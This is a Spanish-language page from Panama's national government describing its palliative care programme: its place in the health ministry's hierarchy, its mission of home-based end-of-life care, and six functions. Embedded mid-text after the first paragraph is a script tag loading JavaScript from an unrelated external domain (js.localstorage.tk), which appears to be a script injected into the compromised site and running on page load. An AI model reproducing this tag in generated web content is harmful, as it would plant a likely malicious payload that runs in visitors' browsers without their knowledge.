Gobierno Nacional de Panamá

Programa de Cuidados Paliativos

Ubicación y dependencia jerárquica

El programa de cuidados paliativos está ubicado en el departamento de Salud y atención integral a la población, el cual se encuentra en el Nivel Operativo Ejecutivo y depende jerárquicamente de la Sub Dirección General de Salud de la Población.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
Misión:
  1. Proveer y desarrollar servicios de salud de alta calidad, preferiblemente en el hogar, a pacientes con enfermedad avanzada en fase terminal, de manera que sean eficientes y seguros, con la participación de un personal competente, comprometido y empático, además de la familia y la comunidad”.
Funciones:
  1. Facilitar modelos de trabajo que permitan el abordaje interdisciplinario de las necesidades de la persona con una enfermedad terminal y su familia.
  2. Coordinar con otros sectores implicados un programa de atención integrado y personalizado para cada paciente.
  3. Impulsar la formación de los profesionales comprometidos, asegurando la satisfacción de los mismos en prestación de los servicios de cuidados paliativos.
  4. Garantizar la provisión de cuidados de salud integral a las personas con una enfermedad avanzada en fase terminal, preferiblemente en su hogar o lugar de residencia, a través de los recursos existentes en la comunidad, incluyendo todas las formas de solidaridad humana y grupos de ayuda mutua.
  5. Garantizar la provisión de información y orientación individualizada al paciente y su familia, particularmente, sobre el afrontamiento del proceso de su enfermedad, tratamiento, duelo y muerte.
  6. Vigilar la salud de los trabajadores que participan en la provisión de los Cuidados Paliativos para garantizar la calidad humanismo de los mismos.